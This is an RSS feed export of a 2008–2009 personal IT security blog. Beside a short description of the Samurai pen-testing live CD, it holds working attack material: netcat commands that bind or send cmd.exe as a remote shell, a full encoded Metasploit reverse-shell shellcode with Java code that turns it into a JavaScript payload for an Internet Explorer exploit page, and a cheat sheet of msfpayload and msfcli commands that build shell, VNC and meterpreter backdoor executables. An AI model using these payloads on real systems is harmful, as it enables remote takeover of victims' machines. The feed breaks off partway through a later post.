<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>IT Security Concept's</title>
	<atom:link href="http://kavasilo.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://kavasilo.wordpress.com</link>
	<description>"I cannot brain today, I have the dumb"</description>
	<lastBuildDate>Tue, 23 Jun 2009 21:51:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='kavasilo.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>IT Security Concept's</title>
		<link>http://kavasilo.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://kavasilo.wordpress.com/osd.xml" title="IT Security Concept&#039;s" />
	<atom:link rel='hub' href='http://kavasilo.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Samurai Web Testing Framework</title>
		<link>http://kavasilo.wordpress.com/2009/05/19/samurai-web-testing-framework/</link>
		<comments>http://kavasilo.wordpress.com/2009/05/19/samurai-web-testing-framework/#comments</comments>
		<pubDate>Tue, 19 May 2009 08:54:50 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=120</guid>
		<description><![CDATA[The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=120&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.</p>
<p>Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-tes<br />
<a href="http://sourceforge.net/project/showfiles.php?group_id=235785&amp;package_id=286383&amp;release_id=683173">Samurai Download</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/120/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/120/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/120/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=120&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2009/05/19/samurai-web-testing-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>Netcat Basics</title>
		<link>http://kavasilo.wordpress.com/2009/04/28/netcat-basics/</link>
		<comments>http://kavasilo.wordpress.com/2009/04/28/netcat-basics/#comments</comments>
		<pubDate>Tue, 28 Apr 2009 12:38:42 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=114</guid>
		<description><![CDATA[Netcat is an essential tool for any pen tester or security consultant. Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable &#8220;back-end&#8221; tool that can be used directly or easily driven by other programs and scripts. At the same [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=114&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Netcat is an essential tool for any pen tester or security consultant. </p>
<p>Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.<br />
It is designed to be a reliable &#8220;back-end&#8221; tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.</p>
<p>It provides access to the following main features:</p>
<p>    * Outbound and inbound connections, TCP or UDP, to or from any ports.<br />
    * Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.<br />
    * Built-in port-scanning capabilities, with randomizer.<br />
    * Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of trasmitted and received data.<br />
    * Optional RFC854 telnet codes parser and responder. </p>
<p>open a terminal a type :</p>
<p>[root@itsecurity /]# nc -h<br />
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]<br />
	  [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]<br />
	  [-x proxy_address[:port]] [hostname] [port[s]]<br />
	Command Summary:<br />
		-4		Use IPv4<br />
		-6		Use IPv6<br />
		-D		Enable the debug socket option<br />
		-d		Detach from stdin<br />
		-h		This help text<br />
		-i secs		Delay interval for lines sent, ports scanned<br />
		-k		Keep inbound sockets open for multiple connects<br />
		-l		Listen mode, for inbound connects<br />
		-n		Suppress name/port resolutions<br />
		-p port		Specify local port for remote connects<br />
		-r		Randomize remote ports<br />
 		-S		Enable the TCP MD5 signature option<br />
		-s addr		Local source address<br />
		-T ToS		Set IP Type of Service<br />
		-C		Send CRLF as line-ending<br />
		-t		Answer TELNET negotiation<br />
		-U		Use UNIX domain socket<br />
		-u		UDP mode<br />
		-v		Verbose<br />
		-w secs		Timeout for connects and final net reads<br />
		-X proto	Proxy protocol: &#8220;4&#8243;, &#8220;5&#8243; (SOCKS) or &#8220;connect&#8221;<br />
		-x addr[:port]	Specify proxy address and port<br />
		-z		Zero-I/O mode [used for scanning]<br />
	Port numbers can be individual or ranges: lo-hi [inclusive]<br />
These are the command line options. I order to connect to a specific port just type:</p>
<p>[root@itsecurity /]# nc -vv host 80</p>
<p>[root@itsecurity /]# nc -vv host 80<br />
Connection to host 80 port [tcp/http] succeeded!<br />
OPTIONS / HTTP/1.0</p>
<p>HTTP/1.1 401 Unauthorized<br />
Content-Length: 1656<br />
Content-Type: text/html<br />
Server: Microsoft-IIS/6.0<br />
WWW-Authenticate: NTLM<br />
Date: Tue, 28 Apr 2009 12:24:25 GMT<br />
Connection: close</p>
<p>In order to  listen to a specific port using netcat type:<br />
[root@itsecurity /]# nc -lvvp 5555</p>
<p>if you want to bind/export your cmd.exe to a tcp port just type</p>
<p>[root@itsecurity /]#nc -lvvp 5555 -e cmd.exe</p>
<p>On the other hand if you want to send to somebody your cmd.exe you must type:</p>
<p>nc -v IP_Address 5555 -e cmd.exe</p>
<p>Thats it folks.  </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/114/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=114&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2009/04/28/netcat-basics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>MS Internet Explorer XML Parsing Buffer Overflow Exploit</title>
		<link>http://kavasilo.wordpress.com/2008/12/19/ms-internet-explorer-xml-parsing-buffer-overflow-exploit/</link>
		<comments>http://kavasilo.wordpress.com/2008/12/19/ms-internet-explorer-xml-parsing-buffer-overflow-exploit/#comments</comments>
		<pubDate>Fri, 19 Dec 2008 09:26:27 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=106</guid>
		<description><![CDATA[Following the new IE exploit i tried to modify the original payload and insert my own. So i change the payload from windows/exec/ to windos/shell_reverse_tcp. My problem was that metasploit does not generate the payload in javascript. After googling i found a wonderfull script to do the job for me. =[ msf v3.2-release + -- [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=106&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Following the new IE exploit i tried to modify the original payload and insert my own. So i change the payload from windows/exec/ to windos/shell_reverse_tcp. My problem was that metasploit does not generate the payload in javascript. After googling i found a wonderfull script to do the job for me.</p>
<p>=[ msf v3.2-release<br />
+ -- --=[ 320 exploits - 217 payloads<br />
+ -- --=[ 20 encoders - 6 nops<br />
=[ 99 aux</p>
<p>msf &gt; use windows/shell_reverse_tcp<br />
msf payload(shell_reverse_tcp) &gt; show options</p>
<p>Module options:</p>
<p>Name      Current Setting  Required  Description<br />
----      ---------------  --------  -----------<br />
EXITFUNC  seh              yes       Exit technique: seh, thread, process<br />
LHOST                      yes       The local address<br />
LPORT     4444             yes       The local port</p>
<p>msf payload(shell_reverse_tcp) &gt; set LHOST 10.0.11.59<br />
LHOST =&gt; 10.0.11.59</p>
<p>msf payload(shell_reverse_tcp) &gt; set EXITFUNC process<br />
EXITFUNC =&gt; process<br />
msf payload(shell_reverse_tcp) &gt; generate -e x86/shikata_ga_nai -t java<br />
/*<br />
* windows/shell_reverse_tcp - 314 bytes<br />
* http://www.metasploit.com<br />
* Encoder: x86/shikata_ga_nai<br />
* EXITFUNC=process, LPORT=4444, LHOST=10.0.11.59<br />
*/<br />
byte shell[] = new byte[]<br />
{<br />
(byte) 0xda, (byte) 0xda, (byte) 0xd9, (byte) 0&#215;74, (byte) 0&#215;24, (byte) 0xf4, (byte) 0xba, (byte) 0x4b,<br />
(byte) 0&#215;49, (byte) 0xa2, (byte) 0xcc, (byte) 0x5b, (byte) 0x2b, (byte) 0xc9, (byte) 0xb1, (byte) 0&#215;48,<br />
(byte) 0&#215;83, (byte) 0xeb, (byte) 0xfc, (byte) 0&#215;31, (byte) 0&#215;53, (byte) 0&#215;16, (byte) 0&#215;03, (byte) 0&#215;53,<br />
(byte) 0&#215;16, (byte) 0xe2, (byte) 0xbe, (byte) 0xb5, (byte) 0xc8, (byte) 0&#215;27, (byte) 0x0d, (byte) 0xae,<br />
(byte) 0xf4, (byte) 0&#215;47, (byte) 0&#215;72, (byte) 0xd1, (byte) 0&#215;67, (byte) 0&#215;33, (byte) 0xe0, (byte) 0x0a,<br />
(byte) 0x4c, (byte) 0xc8, (byte) 0xbd, (byte) 0x6e, (byte) 0&#215;07, (byte) 0xb2, (byte) 0&#215;38, (byte) 0xf7,<br />
(byte) 0&#215;16, (byte) 0xa4, (byte) 0xc9, (byte) 0&#215;48, (byte) 0&#215;01, (byte) 0xb1, (byte) 0&#215;92, (byte) 0&#215;76,<br />
(byte) 0&#215;30, (byte) 0x2e, (byte) 0&#215;65, (byte) 0xfc, (byte) 0&#215;06, (byte) 0x3b, (byte) 0&#215;74, (byte) 0xec,<br />
(byte) 0&#215;56, (byte) 0xfb, (byte) 0xef, (byte) 0x5c, (byte) 0x1c, (byte) 0x3b, (byte) 0x7b, (byte) 0x9a,<br />
(byte) 0xdc, (byte) 0&#215;76, (byte) 0x8e, (byte) 0xa5, (byte) 0x1c, (byte) 0x6d, (byte) 0&#215;64, (byte) 0x9e,<br />
(byte) 0xf4, (byte) 0&#215;56, (byte) 0xac, (byte) 0&#215;94, (byte) 0&#215;11, (byte) 0x1d, (byte) 0xf3, (byte) 0&#215;72,<br />
(byte) 0xdb, (byte) 0xc9, (byte) 0x6d, (byte) 0xf0, (byte) 0xd7, (byte) 0&#215;46, (byte) 0xfa, (byte) 0&#215;59,<br />
(byte) 0xf4, (byte) 0&#215;59, (byte) 0&#215;17, (byte) 0&#215;66, (byte) 0&#215;28, (byte) 0xd1, (byte) 0x6e, (byte) 0&#215;05,<br />
(byte) 0&#215;14, (byte) 0xf9, (byte) 0&#215;11, (byte) 0&#215;15, (byte) 0&#215;65, (byte) 0xda, (byte) 0xb5, (byte) 0&#215;12,<br />
(byte) 0xc5, (byte) 0xec, (byte) 0xbe, (byte) 0&#215;65, (byte) 0xc6, (byte) 0&#215;87, (byte) 0xb0, (byte) 0&#215;79,<br />
(byte) 0x7b, (byte) 0x1c, (byte) 0&#215;70, (byte) 0x8a, (byte) 0xdd, (byte) 0x4b, (byte) 0xfe, (byte) 0xc4,<br />
(byte) 0xef, (byte) 0&#215;67, (byte) 0xae, (byte) 0&#215;27, (byte) 0&#215;39, (byte) 0&#215;11, (byte) 0x1d, (byte) 0xbe,<br />
(byte) 0xae, (byte) 0xed, (byte) 0&#215;93, (byte) 0&#215;56, (byte) 0&#215;58, (byte) 0&#215;61, (byte) 0xe1, (byte) 0xf9,<br />
(byte) 0xf2, (byte) 0x7a, (byte) 0xd5, (byte) 0x6e, (byte) 0&#215;30, (byte) 0&#215;69, (byte) 0&#215;29, (byte) 0&#215;55,<br />
(byte) 0&#215;96, (byte) 0x8d, (byte) 0&#215;07, (byte) 0xf5, (byte) 0x9f, (byte) 0&#215;97, (byte) 0xc1, (byte) 0x8b,<br />
(byte) 0x4d, (byte) 0x5f, (byte) 0x0f, (byte) 0xd9, (byte) 0xe7, (byte) 0&#215;62, (byte) 0xf0, (byte) 0&#215;31,<br />
(byte) 0x9f, (byte) 0xbb, (byte) 0&#215;07, (byte) 0&#215;47, (byte) 0xcd, (byte) 0x6b, (byte) 0xe8, (byte) 0&#215;71,<br />
(byte) 0x5d, (byte) 0xc7, (byte) 0&#215;45, (byte) 0x2d, (byte) 0&#215;21, (byte) 0xb4, (byte) 0x2a, (byte) 0&#215;82,<br />
(byte) 0x5a, (byte) 0xea, (byte) 0xc4, (byte) 0x2e, (byte) 0xa5, (byte) 0&#215;00, (byte) 0x2f, (byte) 0&#215;49,<br />
(byte) 0xcd, (byte) 0&#215;07, (byte) 0&#215;13, (byte) 0xf3, (byte) 0x5e, (byte) 0xa1, (byte) 0x4a, (byte) 0x6e,<br />
(byte) 0&#215;08, (byte) 0x5d, (byte) 0&#215;75, (byte) 0x3b, (byte) 0xa9, (byte) 0xca, (byte) 0x7a, (byte) 0xea,<br />
(byte) 0&#215;40, (byte) 0xe5, (byte) 0xd5, (byte) 0&#215;46, (byte) 0x6a, (byte) 0xd5, (byte) 0xb3, (byte) 0&#215;02,<br />
(byte) 0xf0, (byte) 0xb0, (byte) 0&#215;53, (byte) 0xb0, (byte) 0&#215;95, (byte) 0&#215;56, (byte) 0xf3, (byte) 0x6f,<br />
(byte) 0x4f, (byte) 0x6b, (byte) 0x7a, (byte) 0&#215;68, (byte) 0xe5, (byte) 0&#215;37, (byte) 0xf5, (byte) 0&#215;95,<br />
(byte) 0xcb, (byte) 0&#215;77, (byte) 0xf6, (byte) 0xf0, (byte) 0xb9, (byte) 0xf1, (byte) 0&#215;05, (byte) 0xfa,<br />
(byte) 0&#215;80, (byte) 0x2c, (byte) 0x0b, (byte) 0&#215;41, (byte) 0&#215;29, (byte) 0xa2, (byte) 0&#215;89, (byte) 0x7e,<br />
(byte) 0x9a, (byte) 0&#215;17, (byte) 0xc6, (byte) 0&#215;17, (byte) 0xae, (byte) 0&#215;99, (byte) 0xab, (byte) 0xfe,<br />
(byte) 0xb1, (byte) 0&#215;13, (byte) 0xe3, (byte) 0&#215;01, (byte) 0x9b, (byte) 0&#215;87, (byte) 0xa4, (byte) 0xaf,<br />
(byte) 0&#215;75, (byte) 0&#215;69, (byte) 0x1b, (byte) 0x3a, (byte) 0&#215;77, (byte) 0xd8, (byte) 0xca, (byte) 0xef,<br />
(byte) 0&#215;26, (byte) 0&#215;25, (byte) 0x3c, (byte) 0&#215;67, (byte) 0&#215;64, (byte) 0&#215;00, (byte) 0xb9, (byte) 0xb6,<br />
(byte) 0&#215;25, (byte) 0x4c, (byte) 0&#215;17, (byte) 0x2c, (byte) 0&#215;35, (byte) 0x4d, (byte) 0xa0, (byte) 0x4e,<br />
(byte) 0&#215;19, (byte) 0xda, (byte) 0&#215;29, (byte) 0xc9, (byte) 0x5c, (byte) 0&#215;62, (byte) 0x4a, (byte) 0x5f,<br />
(byte) 0&#215;65, (byte) 0x6a, (byte) 0&#215;62, (byte) 0x5f, (byte) 0&#215;12, (byte) 0&#215;68, (byte) 0&#215;75, (byte) 0&#215;70,<br />
(byte) 0xb5, (byte) 0xee, (byte) 0&#215;51, (byte) 0&#215;93, (byte) 0&#215;35, (byte) 0x5c, (byte) 0x9e, (byte) 0&#215;82,<br />
(byte) 0&#215;45, (byte) 0xb2<br />
};</p>
<p>So now Use the following java code (toJS) to change your paylaod to javascript:</p>
<pre>public class toJS {

 static int LENGTH=870;

 static byte shell[] = new byte[]

                         {

                                // your shell code goes here 

                         };

 public static void main(String[] args) {

  String shell2 = "";

  for (int i=0; i&lt; LENGTH; i=i+2)

  {

   int b1 =((byte) shell[i+1] &lt;&lt; <img src='http://s2.wp.com/wp-includes/images/smilies/icon_cool.gif' alt='8)' class='wp-smiley' /> &amp; 0x0000ff00;

   b1 =  b1 | ((byte) shell[i] &amp; 0x000000ff);

   String word  = Integer.toHexString(b1);

   if(word.length()==0)

     word = "0000";

   else if (word.length() ==1)

     word = "000" + word;

   else if( word.length() ==2 )

    word = "00" + word;

   else if( word.length() ==3 )

    word = "0" + word;

   shell2 += "%u" + word;

  }

  System.out.println(shell2);

 }

}</pre>
<p>The only change you have to do is in this line. Our payload is 314 bytes.</p>
<p>static int LENGTH=870;</p>
<p>So now just type ( I assume you allready have jdk installed) :</p>
<p>javac toJS.java</p>
<p>java toJS</p>
<p>Your javascript payload is ready. Copy it and paste it to the html file.</p>
<p>If you are looking for the patch here is the link</p>
<p><a href="http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx">www.microsoft.com/technet/security/bulletin/ms08-078.mspx </a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/106/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=106&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/12/19/ms-internet-explorer-xml-parsing-buffer-overflow-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>- msfpayloads -</title>
		<link>http://kavasilo.wordpress.com/2008/12/18/msfpayloads/</link>
		<comments>http://kavasilo.wordpress.com/2008/12/18/msfpayloads/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 09:42:08 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/2008/12/18/msfpayloads/</guid>
		<description><![CDATA[1. For a listening shell on the target Create payload: ./msfpayload windows/shell_bind_tcp LPORT=4444 X &#62; open_shell_on_port.exe So use netcat to connect to the victim: nc xxx.xxx.xxx.xxx 4444 2. For a reverse shell on the target Create payload: ./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X &#62; reverse-shell.exe So now wait for a shell: ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E 3. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=102&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>1. For a listening shell on the target</strong></p>
<p>Create payload:<br />
./msfpayload windows/shell_bind_tcp LPORT=4444 X &gt; open_shell_on_port.exe</p>
<p>So use netcat to connect to the victim:<br />
nc xxx.xxx.xxx.xxx 4444</p>
<p><strong>2. For a reverse shell on the target</strong></p>
<p>Create payload:<br />
./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X &gt; reverse-shell.exe</p>
<p>So now wait for a shell:<br />
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E</p>
<p><strong>3. For a VNC listener on target</strong></p>
<p>Create payload:<br />
./msfpayload windows/vncinject/bind_tcp LPORT=4444 X &gt; listen-vnc.exe</p>
<p>Run this command to connect to the target system:</p>
<p>./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=4444 RHOST=xxx.xxx.xxx.xxx DisableCourtesyShell=TRUE E</p>
<p><strong>4. For a reverse VNC session</strong></p>
<p>Create payload:<br />
./msfpayload windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X &gt; /tmp/reverse-vnc.exe</p>
<p>Run this command and wait for the remote system to connect to you:<br />
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E</p>
<p><strong>5. For a meterpreter listener</strong></p>
<p>create payload:<br />
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X &gt; metepreter_bind.exe</p>
<p>To connect to the victim run :<br />
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/102/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/102/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/102/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=102&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/12/18/msfpayloads/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>Η ελληνική «νύχτα των κρυστάλλων»</title>
		<link>http://kavasilo.wordpress.com/2008/12/15/%ce%b7-%ce%b5%ce%bb%ce%bb%ce%b7%ce%bd%ce%b9%ce%ba%ce%ae-%c2%ab%ce%bd%cf%8d%cf%87%cf%84%ce%b1-%cf%84%cf%89%ce%bd-%ce%ba%cf%81%cf%85%cf%83%cf%84%ce%ac%ce%bb%ce%bb%cf%89%ce%bd%c2%bb/</link>
		<comments>http://kavasilo.wordpress.com/2008/12/15/%ce%b7-%ce%b5%ce%bb%ce%bb%ce%b7%ce%bd%ce%b9%ce%ba%ce%ae-%c2%ab%ce%bd%cf%8d%cf%87%cf%84%ce%b1-%cf%84%cf%89%ce%bd-%ce%ba%cf%81%cf%85%cf%83%cf%84%ce%ac%ce%bb%ce%bb%cf%89%ce%bd%c2%bb/#comments</comments>
		<pubDate>Mon, 15 Dec 2008 10:02:30 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=100</guid>
